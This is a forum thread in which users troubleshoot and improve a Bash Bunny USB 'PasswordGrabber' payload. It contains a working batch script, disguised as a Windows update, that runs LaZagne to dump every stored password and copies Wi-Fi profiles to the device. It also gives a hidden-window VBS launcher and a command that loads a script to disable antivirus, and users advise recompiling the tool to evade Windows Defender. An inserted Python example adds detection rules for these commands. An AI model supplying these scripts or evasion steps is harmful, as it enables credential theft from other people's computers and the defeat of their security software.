Cech Posted November 16, 2017
Hey guys, I've recently bought a Bash Bunny and I've tried to set PasswordGrabber on Switch2. I've copied all the files (d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md). Once I switch it from arming mode to switch2 (attack mode) and I place it into a victim's PC (test PC) on Windows 10, the green LED starts to flash within a few seconds (which probably means to remove it, right?). Once I remove it and switch it back to arming mode on my PC, I get empty directories and empty notepad files. Can anyone please tell me if I'm doing something wrong? Thank you in advance guys
qdba Posted November 22, 2017
Maybe a virus scanner. lazagne.exe was mostly caught by AV.
Struthian Posted November 25, 2017
The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory. Here is the one I edited so that it works for illustration. I also attached the version of it I created and which works, tested on latest Windows 10. If the virus scanner blocked LaZagne, then the directory would be created. Notice the formatting of drec, then the use of dst instead of drec. Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration. I am continuing to investigate and improve this payload. Following is for illustration, actual e.cmd is attached.

    @echo off
    @echo Installing Windows Update
    setlocal
    cd /d %~dp0
    REM Time and Date
    set drec=%COMPUTERNAME%_%date%_%TIME: =0%
    REM make drec a legit filename.
    set drec=%drec: =_%
    set drec=%drec::=%
    set drec=%drec:/=_%
    set drec=%drec:.=_%
    set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
    mkdir %dst% >>nul
    REM This executes LaZagne in the current directory and outputs the password file to Loot
    REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
    %~dp0\laZagne.exe all -v > "%dst%\passwords.txt"
    if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
    xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
    )
    REM Blink CAPSLOCK key
    start /b /wait powershell.exe -nologo -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
    @cls
    @exit

e.cmd
Clean_Focus Posted December 3, 2017
Nice edits, I also made a few small changes myself. I edited i.vbs to call the .cmd file directly...seems to have no bugs in my testing.

i.vbs

    Set objShell = CreateObject("WScript.Shell")
    strPath = Wscript.ScriptFullName
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.GetFile(strPath)
    strFolder = "powershell -nologo -WindowStyle Hidden -ExecutionPolicy unrestriced " & objFSO.GetParentFolderName(objFile) & "\e.cmd"
    objShell.Run strFolder

and then just remove %~dp0\e.cmd from d.cmd
Am3ience Posted February 21, 2018
Isn't there also a problem with the PasswordGrabber payload wanting the Lazagne.exe in the tools folder? But every time you re-arm the Bunny it deletes the .exe
C1PH3R Posted February 21, 2018
14 hours ago, Am3ience said: Isn't there also a problem with the PasswordGrabber payload wanting the Lazagne.exe in the tools folder? But every time you re-arm the Bunny it deletes the .exe

You could paste a little piece of code before that, that disables the AV:

    RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"

That was the code and then you need this file: https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1
PoSHMagiC0de Posted February 21, 2018
I haven't tested yet to see if "Set-MpPreference" affects all AV on the machine (like AVAST) or just Windows Defender.
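A defender-side view of the command lines quoted in the posts above, as an added example that is not part of any forum post: Python triage over constructed process-creation records (the kind of data Sysmon Event ID 1 or Security Event ID 4688 provides). The host names, the E: drive letter, the rule names and the escalation threshold are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Regexes over process command lines, built from the commands quoted in this thread.
# Rule names are hypothetical labels chosen for this example.
RULES = {
    # PowerShell with a hidden window and an execution-policy override
    "ps_hidden_policy_override": re.compile(
        r"powershell(\.exe)?(?=.*\s-w\w*\s+hidden)(?=.*\s-e[xp]\w*\s+(bypass|unrestric))", re.I),
    # Script path resolved by looking a volume up by its label (removable media)
    "script_path_from_volume_label": re.compile(
        r"(gwmi|get-wmiobject)\s+win32_volume\b.*label\s*=", re.I),
    # Any Defender preference change issued from a command line
    "defender_preference_change": re.compile(r"\bset-mppreference\b", re.I),
    # LaZagne started with its 'all' module
    "lazagne_all_modules": re.compile(r"lazagne(\.exe)?[\"']?\s+all\b", re.I),
}

def match_rules(cmdline):
    """Return the sorted names of every rule the command line trips."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def triage(events, threshold=2):
    """Collect rule hits per host; escalate hosts with >= threshold distinct rules."""
    hits = defaultdict(set)
    for ev in events:
        hits[ev["host"]].update(match_rules(ev["cmdline"]))
    return {host: sorted(names) for host, names in hits.items() if len(names) >= threshold}

# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "LAB-PC1", "cmdline": r"Powershell -nop -ex Bypass -w Hidden .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\disable-anti-virus.ps1')"},
    {"host": "LAB-PC1", "cmdline": r"E:\payloads\switch2\laZagne.exe all -v"},
    {"host": "LAB-PC2", "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"host": "LAB-PC3", "cmdline": "powershell.exe -Command Set-MpPreference <arguments elided>"},
]

if __name__ == "__main__":
    for host, names in triage(SAMPLE_EVENTS).items():
        print(host, names)
```

A cmdlet called from inside a .ps1 file does not appear in the process command line; matching it there requires PowerShell script block logging (Event ID 4104) as the input instead.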
Am3ience Posted February 21, 2018
1 hour ago, C1PH3R said: You could paste a little piece of code before that that disables the av:

    RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"

That was the code and then you need this file: https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1

I had AV disabled on my computer that was re-arming the bunny, and the .exe still disappeared.
C1PH3R Posted February 22, 2018
21 hours ago, Am3ience said: I had AV disabled on my computer that was re-arming the bunny, and the .exe still disappeared.

Huh, that is strange.
RazerBlade Posted February 22, 2018
Windows Defender removes it.
Spoonman Posted April 16, 2018
On 2018-02-22 at 11:35 AM, RazerBlade said: Windows Defender removes it.

Yeah, Windows Defender needs to be turned off. I just started playing around with this, maybe I can find something to auto-turn it off if that's even possible
RazerBlade Posted April 17, 2018
12 hours ago, Spoonman said: Yeah, Windows Defender needs to be turned off. I just started playing around with this, maybe I can find something to auto-turn it off if that's even possible

A better way would be to compile the code yourself and add a couple of comments to change the file signature.
Naked_eye Posted April 30, 2018
I have been playing with Python for hours trying to figure out how to compile this. It can't be that complicated. I got 2.7, used pip to install all the dependencies and tried cx_freeze and I get errors. Is there an earlier version of Python or somewhere that gives compile instructions?
Naked_eye Posted May 1, 2018
On 4/17/2018 at 4:31 AM, RazerBlade said: A better way would be to compile the code yourself and add a couple of comments to change the file signature.

I figured it out following these instructions: https://github.com/AlessandroZ/LaZagne/wiki/How-to-compile Thanks!
DennisVeninga Posted May 11, 2018
I've modified this payload for disabling Windows Defender (only) and activating again after finishing. https://github.com/DennisVeninga/BashBunny-Projects/tree/master/PasswordGrabber-v2
Garcik Posted May 11, 2018
2 hours ago, DennisVeninga said: I've modified this payload for disabling Windows Defender (only) and activating again after finishing. https://github.com/DennisVeninga/BashBunny-Projects/tree/master/PasswordGrabber-v2

I have done what you say and it doesn't work for me. Why? I am new at this, help
Lycianus Posted May 28, 2018
On 11/25/2017 at 5:50 PM, Struthian said: The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory. Here is the one I edited so that it works for illustration. I also attached the version of it I created and which works, tested on latest Windows 10. If the virus scanner blocked LaZagne, then the directory would be created. Notice the formatting of drec, then the use of dst instead of drec. Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration. I am continuing to investigate and improve this payload. Following is for illustration, actual e.cmd is attached.

    @echo off
    @echo Installing Windows Update
    setlocal
    cd /d %~dp0
    REM Time and Date
    set drec=%COMPUTERNAME%_%date%_%TIME: =0%
    REM make drec a legit filename.
    set drec=%drec: =_%
    set drec=%drec::=%
    set drec=%drec:/=_%
    set drec=%drec:.=_%
    set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
    mkdir %dst% >>nul
    REM This executes LaZagne in the current directory and outputs the password file to Loot
    REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
    %~dp0\laZagne.exe all -v > "%dst%\passwords.txt"
    if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
    xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
    )
    REM Blink CAPSLOCK key
    start /b /wait powershell.exe -nologo -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
    @cls
    @exit

e.cmd

Hello, you have function USB_Exfiltration and PasswordGrabber? Could you share the files please?
Archived
This topic is now archived and is closed to further replies.